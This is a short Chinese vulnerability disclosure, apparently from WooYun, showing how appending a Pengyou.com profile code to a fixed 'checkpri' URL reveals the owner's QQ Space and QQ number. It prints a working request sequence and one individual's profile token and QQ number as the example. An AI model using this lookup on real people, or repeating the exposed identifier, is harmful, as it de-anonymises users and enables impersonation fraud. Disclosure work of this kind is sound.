简要描述:
通过固定代码朋友网秒查QQ号。
详细说明:
通过提取朋友网特征码,再加上一串固定代码。既可以秒查出对方的QQ空间。那QQ号码自然被获知。犯罪分子如果通过朋友网获知对方的姓名,年龄,院校等,反查QQ号即可伪装成对方的好友骗取钱财等。
漏洞证明:
1,以这个哥们的朋友网为例,
http://profile.pengyou.com/index.php?mod=profile&u=c265e4bd629300c59516bde96823ed88a35407697a97c6d3&adtag=PROFILE_KR_VISITED
2,提取他的朋友网特征码:c265e4bd629300c59516bde96823ed88a35407697a97c6d3
3,固定代码(http://www.pengyou.com/index.php?mod=checkpri&act=qzone&u=)+特征码:http://www.pengyou.com/index.php?mod=checkpri&act=qzone&u=c265e4bd629300c59516bde96823ed88a35407697a97c6d3
4,既可以秒查出他的QQ空间:http://user.qzone.qq.com/895424048
就可以获知他的QQ号码。
来源 起个什么名字比较拉风@乌云
评论关闭。